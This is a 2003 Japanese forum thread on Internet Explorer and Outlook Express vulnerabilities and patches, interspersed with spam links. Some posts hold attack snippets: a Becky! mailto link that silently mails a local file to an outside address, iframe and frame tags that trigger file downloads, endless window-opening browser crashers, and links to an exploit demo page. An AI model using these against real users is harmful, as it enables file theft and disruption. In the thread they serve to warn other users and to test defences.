パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。


423 :cheshire-cat ◆CATBCJABLA :03/04/21 21:55
>攻撃者が攻撃を行うには、直接コンソールで、またはターミナル セッションを介し、標的となるコンピュータに対話的にログオンできることが必要条件となります。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-013.asp

MS03-013って、当面の間は導入する必要性は薄いような予感。

424 :名無しさん@お腹いっぱい。:03/04/23 01:18
ここ面白かった

http://plaza16.mbn.or.jp/~satchel/


425 :名無しさん@お腹いっぱい。:03/04/23 11:13
>>410MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/
 ・Microsoft VMに「緊急」のセキュリティ・ホール
 ・Microsoft VMのサポートは2003年末まで
 ・トラブルが続出するWindows Update
 ・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
 ・ISA Serverにセキュリティ・ホール
 ・Indexing Server for Windows NT 4.0用パッチが公開
 ・TechNet Online セキュリティでは“月例”ドキュメント

426 :名無しさん@お腹いっぱい。:03/04/24 10:31
IEとOutlook Expressに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0304/24/nebt_06.html

427 :名無しさん@お腹いっぱい。:03/04/24 10:54
>>426
WindowsUpdateにあがっている。
MS03-015
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-015ov.asp
MS03-014
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-014ov.asp

428 :名無しさん@お腹いっぱい。:03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど
それはもう改善されてんの?
もうMS03-014あてても大丈夫?


429 :名無しさん@お腹いっぱい。:03/04/24 11:49
>>428
MS03-013では?>>420-423
MS03-014は公表されたばかりだが。

430 :名無しさん@お腹いっぱい。:03/04/24 11:50
間違えた!
MS03-014じゃなくてMS03-004だった。


MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803


431 :名無しさん@お腹いっぱい。:03/04/24 11:54
オペレーターとチャットで相談って使えんの?
今、初めて知ったんだけど。

432 :名無しさん@お腹いっぱい。:03/04/24 11:55
>>428
MS03-004だろ。>>365
改善されてないよ。

MS03-014にMS03-004の不具合の修正がされてればいいのだが、詳細不明。

433 :名無しさん@お腹いっぱい。:03/04/24 11:59
>>432
そうそれ。>>430

434 :名無しさん@お腹いっぱい。:03/04/24 12:13
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。

しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(>>423)、が吉。

もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。

435 :MS03-014,MS03-015:03/04/24 12:54
>>426-427関連
IEとOutlook Expressに「緊急」のセキュリティ・ホール,Windows Updateの実施を
任意のコードを実行させられる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/1/

436 :名無しさん@お腹いっぱい。:03/04/24 17:24
age

437 :MS03-007:03/04/24 17:46
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、脆弱性の調査をさらに続けた結果
Windows NT 4.0 についても同じ脆弱性が存在したため、Windows NT4.0
および Windows NT4.0 Terminal Server Edition 用の修正プログラム
の情報を追加しました。

Windows 2000と同じセキュリティ・ホールがWindows NTに,ただし深刻度は「重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/

438 :人柱は!!!!!!!!!:03/04/24 21:15
 

439 :名無しさん@お腹いっぱい。:03/04/24 21:27
>>438
自分でやれ。

440 :cheshire-cat ◆CATBCJABLA :03/04/24 22:54
MS03-013不具合 - パフォーマンス低下(XP SP1)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-013.asp


441 :名無しさん@お腹いっぱい。:03/04/25 10:56
age

442 :名無しさん@お腹いっぱい。:03/04/26 17:42
Sunの最新JavaランタイムがIEで使えないことが判明したんで
SunのをウンインスコしてMS-VMを最新にしたところ
セキュ確認済みの未認可AxtiveXが動かない
そこでサンドボックス限定で許可したらOK

とゆーことは

SunのプラグインはOSのセキュ設定レベル見てない
サイト鯖自体のセキュ区分で許可の有無はできるが
こういうあいまいな部分で素通しなのか
ネスケみてえだ

443 :名無しさん@お腹いっぱい。:03/05/02 13:39
「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/

444 :名無しさん@お腹いっぱい。:03/05/02 13:47
結局shurikenpro買ったよ

445 :名無しさん@お腹いっぱい。:03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。

http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16


65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!

mailto:2ch@2ch.net?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo

こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!


67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。

>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。

446 :名無しさん@お腹いっぱい。:03/05/03 17:43
だから最新パッチあててるOEの方が安全だってば。

447 :名無しさん@お腹いっぱい。:03/05/03 17:52
2.05.11キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

http://www.rimarts.co.jp/becky-j.htm

448 :名無しさん@お腹いっぱい。:03/05/07 14:07
>>440
ウィルスバスターがダメなんだと

449 :名無しさん@お腹いっぱい。:03/05/07 21:49
>>448
ソースは?

450 :名無しさん@お腹いっぱい。:03/05/12 17:06
IEとスクリプトの“危険な関係”(上)
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”(中)
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”(下)
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/

451 :動画直リン:03/05/12 17:10
http://homepage.mac.com/hitomi18/

452 :名無しさん@お腹いっぱい。:03/05/12 17:12
Opera for Windowsに新しいセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101

453 :名無しさん@お腹いっぱい。:03/05/15 23:43
Internet Explorerがfile:// リクエストの際にゾーンを無視する
http://www.symantec.com/region/jp/sarcj/security/content/7539.html

454 :名無しさん@お腹いっぱい。:03/05/16 00:56
>>453
うわっ またなんかすごいの来たー


455 :名無しさん@お腹いっぱい。:03/05/19 17:53
MSサポートを装うウイルスに注意
http://www.zdnet.co.jp/news/0305/19/njbt_03.html

IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/

米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html

456 :名無しさん@お腹いっぱい。:03/05/19 18:43
>>455
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる!
H系DLに紛れ込んで何でもやり放題?

457 :名無しさん@お腹いっぱい。:03/05/19 20:51
Hotfix出てないんかい

458 :cheshire-cat ◆CATBCJABLA :03/05/19 20:54
>>453
>>455
やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。

Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。

459 :名無しさん@お腹いっぱい。:03/05/19 22:05
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。

ここサンプルページ(要注意)
http://www.malware.com/forceframe.html

460 :yuis:03/05/19 22:06
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!

http://www.dvd-yuis.com/

461 :名無しさん@お腹いっぱい。:03/05/19 22:16
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。

462 :名無しさん@お腹いっぱい。:03/05/19 22:32
Opera使いの俺はだいじょうび

463 :cheshire-cat ◆CATBCJABLA :03/05/19 22:41
報告。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん!」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。


464 :cheshire-cat ◆CATBCJABLA :03/05/19 23:02
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。

下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。


465 :名無しさん@お腹いっぱい。:03/05/19 23:13
>>459
やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな?

466 :ぼるじょあ ◆yBEncckFOU :03/05/19 23:31
>>465
(・3・) エェー スラッシュ.に同じような報告あったYO


467 :名無しさん@お腹いっぱい。:03/05/19 23:50
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ



468 :名無しさん@お腹いっぱい。:03/05/21 02:39
Irvineのクリックキャッチを有効にしとくと
1個ずつしかダイアログが出なくなるから大丈夫げ

469 :山崎渉:03/05/22 02:01
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

470 :(≡゜♀゜≡)):03/05/22 02:38


471 :名無しさん@お腹いっぱい。:03/05/24 11:45
>>453 >>459 のFixまだ無いの?

472 :名無しさん@お腹いっぱい。:03/05/28 12:06
またもやパッチに不具合,すべてのパッチをアンインストール可能に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/

473 :名無しさん@お腹いっぱい。:03/05/28 13:34
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴
溜まってるのに。。

474 :m:03/05/28 16:06
◎ちょっと見て見て!!◎
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

475 :名無しさん@お腹いっぱい。:03/05/28 16:45
そろそろ新OS出すために
バグをちらほらと小出しにしてる感じだな

476 :名無しさん@お腹いっぱい。:03/05/29 00:11
age

477 :名無しさん@お腹いっぱい。:03/05/29 10:21
最善の対策:MSOE使うな。

--------------------------終了----------------------------

478 :名無しさん@お腹いっぱい。:03/05/29 12:16
>>477
では、お勧めのメーラは?

479 :名無しさん@お腹いっぱい。:03/05/29 13:27
>>478
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。

480 :名無しさん@お腹いっぱい。:03/05/29 19:20
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと
まずいんですか?

481 :名無しさん@お腹いっぱい。:03/05/29 20:07
>>480
DonutPはIEコンポーネントブラウザです

482 :名無しさん@お腹いっぱい。:03/05/29 20:12
>>481
まずいってことですね?
イマイチその言葉の意味がよくわからんで、、、

パッチ当てて出直してきます。

483 :名無しさん@お腹いっぱい。:03/06/02 21:31
>>440関連
Windows XPでパフォーマンスに悪影響を与えるパッチの改訂版が登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030602/1/

484 :名無しさん@お腹いっぱい。:03/06/02 21:34
MS03-019 今回の更新内容
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp

Windows NT/2000のセキュリティ・ホールの深刻度が,より深刻な「重要」に変更
 リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/

485 :名無しさん@お腹いっぱい。:03/06/03 09:28
HTMLメールはやめよう
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030530/2/

486 :名無しさん@お腹いっぱい。:03/06/03 09:38
OEは常にウイルスのターゲットになるからやめとけ

>>478
Edmaxフリー版とか

>>479
どうやってメモ帳をメーラーとして使うんだよ


487 :名無しさん@お腹いっぱい。:03/06/03 10:35
>>485
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。

完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可

488 :名無しさん@お腹いっぱい。:03/06/03 11:59
>>485
HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。

489 :名無しさん@お腹いっぱい。:03/06/03 13:18
>>486
>どうやってメモ帳をメーラーとして使うんだよ

電信8号

490 :名無しさん@お腹いっぱい。:03/06/03 16:17
EdMAXはメッセージを来たままの状態で保存しないから、糞。

491 :名無しさん@お腹いっぱい。:03/06/04 10:19
Microsoft,「IE 6 SP1が独立した最後のWebブラウザ」と語る
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm

492 :名無しさん@お腹いっぱい。:03/06/04 10:38
先生方よろしくお願いします。
メールソフトは outlook expressを使用していますが
受信メール、送信メールが全て無くなっています。
何日か前にブラクラ踏んでしまい、その後受信メールだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信メール+送信メールが無くなって
いました。
原因は先日踏んだブラクラなのでしょうか?
そしてほっておくとまたこのような事がおきるのでしょうか?
良きアドバイスお願いします。


493 :_:03/06/04 10:44
http://homepage.mac.com/hiroyuki43/jaz09.html

494 :名無しさん@お腹いっぱい。:03/06/04 10:45
>>492
諦めて、OEを再インスコすれ
その際にウィルススキャンするのも忘れずに

495 :名無しさん@お腹いっぱい。:03/06/04 10:53
>>492
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。

ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?

496 :名無しさん@お腹いっぱい。:03/06/04 11:38
>>494>>495さん
ありがとうございました

497 :MS03-020:03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

498 :MS03-020:03/06/05 09:25
●修正プログラム
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe

・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe

注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。

・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe

(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。

499 :名無しさん@お腹いっぱい。:03/06/05 13:16
>>497-498
IEに2種類の危険なセキュリティ・ホール,任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
(1)Objectタグの処理に関するセキュリティ・ホール
(2)ファイルのダウンロード・ダイアログに関するセキュリティ・ホール

500 :名無しさん@お腹いっぱい。:03/06/05 13:37
新たに2つ「緊急」の脆弱性、MSがIE用の累積パッチを公開
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ(MS03-020)を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html



501 :名無しさん@お腹いっぱい。:03/06/05 15:01
>>498 って >>455
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"

のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?

>>453 のゾーン無視の方はどうなってるのだろ。。。


502 :名無しさん@お腹いっぱい。:03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?

503 :名無しさん@お腹いっぱい。:03/06/05 15:41
>>501, >>501
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。

504 :名無しさん@お腹いっぱい。:03/06/05 15:47
>>503
さんきゅです

505 :名無しさん@お腹いっぱい。:03/06/05 16:14
>>502
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ

506 :名無しさん@お腹いっぱい。:03/06/05 16:22
>>505
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。

507 :名無しさん@お腹いっぱい。:03/06/05 16:23
あ! マイコンピューターもちゃんと視野に入ってるのね >>502

508 :502:03/06/05 16:31
>>507
そうでぃ〜す! いずれにしても、レスありがとうございます。

まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。

509 :名無しさん@お腹いっぱい。:03/06/05 16:42
>>508
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。

<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>

510 :負け犬502:03/06/05 16:56
>>509
さっそくやってみました。たしかに出ました、ダイアログが!
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。

511 :名無しさん@お腹いっぱい。:03/06/05 23:34
「ファイル交換ソフトで感染を広げるウイルスの届け出数が急増中」――IPA
ブラウザ・クラッシャによる被害も増加中,設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/

コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html

512 :名無しさん@お腹いっぱい。:03/06/06 10:39
メール機能を悪用する主なウイルス一覧
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日:2003年 6月 5日

513 :名無しさん@お腹いっぱい。:03/06/07 00:27
age

514 :名無しさん@お腹いっぱい。:03/06/09 22:49
age

515 :とも:03/06/09 22:51
みてね〜♪
http://www1.free-city.net/home/s-rf9/page002.html

516 :名無しさん@お腹いっぱい。:03/06/10 12:42
>>485
【結果発表】HTMLメールをどう思いますか?
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030609/1/

517 :名無しさん@お腹いっぱい。:03/06/10 14:16
【川崎憲次郎投手をオールスターに!】

ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html



      

518 :名無しさん@お腹いっぱい。:03/06/15 23:10
セキュリティ・ホールを修正した「Opera7.11 for Windows 日本語版」が公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/

519 :名無しさん@お腹いっぱい。:03/06/16 11:12
>>518
スレ違いだろ。

520 :名無しさん@お腹いっぱい。:03/06/17 01:59
MS03-020って烈しく無意味なのですが・・
http://www.malware.com/forceframe.html

521 :名無しさん@お腹いっぱい。:03/06/17 02:09
>>520
Operaもだめみたい
mozillaは大丈夫

522 :名無しさん@お腹いっぱい。:03/06/17 09:34
>>520氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。

523 :名無しさん@お腹いっぱい。:03/06/17 10:17
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!

524 :名無しさん@お腹いっぱい。:03/06/17 10:49
>>520
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。

大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。

525 :名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか?
更新しようとしても、98についの説明がありません。

それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか?
壊れ始めているよ〜だ! SOS, SOS, , ,

526 :名無しさん@お腹いっぱい。:03/06/17 13:29
>>525
Win98は今月末までのサポート。
Windows板http://pc2.2ch.net/win/

マウスの件はマウスを買い換えろ。壊れてるだけ。
念のためウィルススキャンしろ。

527 :名無しさん@お腹いっぱい。:03/06/17 13:40
おっ、Piggybackで止まった


528 :_:03/06/17 13:57
http://homepage.mac.com/hiroyuki44/

529 :名無しさん@お腹いっぱい。:03/06/17 16:12
>>522
>>459で既出のサンプルページだろ。
>>520も一言説明して貼るべきとは思うが・・・。

530 :名無しさん@お腹いっぱい。:03/06/17 17:52
直リンもやめるべきだろう。
>>520のメール欄を見る限りは確信犯。

531 :名無しさん@お腹いっぱい。:03/06/17 23:34
age

532 :名無しさん@お腹いっぱい。:03/06/18 09:59
IEの新しい累積パッチにはいくつかの注意点,既に適用したユーザーも再確認を
 既知のホールを解消できるものの不完全,ブラウザ・クラッシャは回避できない
 今週のSecurity Check [Windows編] (第97回,2003年6月18日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/

533 :名無しさん@お腹いっぱい。:03/06/18 21:14
Microsoft的にはブラクラは優先的に対処すべきセキュリティホール
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある

534 :名無しさん@お腹いっぱい。:03/06/19 00:16
あげ

535 :n:03/06/19 00:21
☆頑張ってまーす!!☆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

536 :名無しさん@お腹いっぱい。:03/06/19 14:07
>>533
OSごと落ちる9x系
MS的には「昔そんなのありましたっけ?さっさとXP買ってね」

まあ優先は他の穴だとは思うけどさ

537 :名無しさん@お腹いっぱい。:03/06/19 21:34
>>526
どうもありがとう。行って来ました。

538 :名無しさん@お腹いっぱい。:03/06/19 22:13
Win2k/XPなら制限付きユーザーでブラウズすると、
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。

539 :名無しさん@お腹いっぱい。:03/06/20 00:30
age

540 :名無しさん@お腹いっぱい。:03/06/22 20:27
あげ

541 :名無しさん@お腹いっぱい。:03/06/23 01:32
  _, ._
  ( ゚ Д゚)
  ( つ O   ガシャ
  と_)_)  __
       (__()、;.o:。
         ゚*・:.。


542 :名無しさん@お腹いっぱい。:03/06/25 19:27
age

543 :名無しさん@お腹いっぱい。:03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP

544 :名無しさん@お腹いっぱい。:03/06/26 23:24
IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm

545 :IE5.5SP2日本語版:03/06/27 00:44
IE5.5SP2のダウンロードは終了したはずだが、
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja

546 :名無しさん@お腹いっぱい。:03/06/27 01:23
>>545
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない

547 :名無しさん@お腹いっぱい。:03/06/27 07:35
>>545
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが

548 :名無しさん@お腹いっぱい。:03/06/27 12:30
http://www.zdnet.co.jp/news/0306/27/nebt_18.html
判決出た。搭載命令は撤回

549 :名無しさん@お腹いっぱい。:03/06/27 13:30
米Sunと米MSのJava訴訟,Java搭載の仮命令は差し戻し
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/

550 :名無しさん@お腹いっぱい。:03/06/27 17:19
>>545
ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか?

551 :名無しさん@お腹いっぱい。:03/06/27 17:44
>>550
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…

552 :名無しさん@お腹いっぱい。:03/06/28 00:37
>>551
駅に置いてあるやつでいいの?

553 :名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い?
ダウンロードしてなにか問題がなかったでしょうか? あったような?

554 :名無しさん@お腹いっぱい。:03/06/28 19:52
>>553
( ゚д゚)ポカーン

555 :名無しさん@お腹いっぱい。:03/06/28 20:00
私のところにメールが頻繁に届きます。
本当に簡単な仕事ですか?と聞かれますので
答えました。簡単なビジネスです。1日の労働時間は
2時間です。皆さんは0円から行い、
最終的に年商3000万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm

556 :名無しさん@お腹いっぱい。:03/06/29 00:58
>>553
Windows98 はあと3、4年ぐらい不滅です!Part2
http://pc2.2ch.net/test/read.cgi/win/1055040506/l50

557 :名無しさん@お腹いっぱい。:03/07/02 11:22
EdMax, WeMail32など複数のWindowsメーラにセキュリティホール
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html

558 :名無しさん@お腹いっぱい。:03/07/04 00:37
OEを糞といってた諸君、一言どうぞ。

559 :名無しさん@お腹いっぱい。:03/07/04 06:15
Outlook Express6SP1を使っています。
ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。

環境はxpsp1 
関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。

---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------


560 :559:03/07/04 06:19
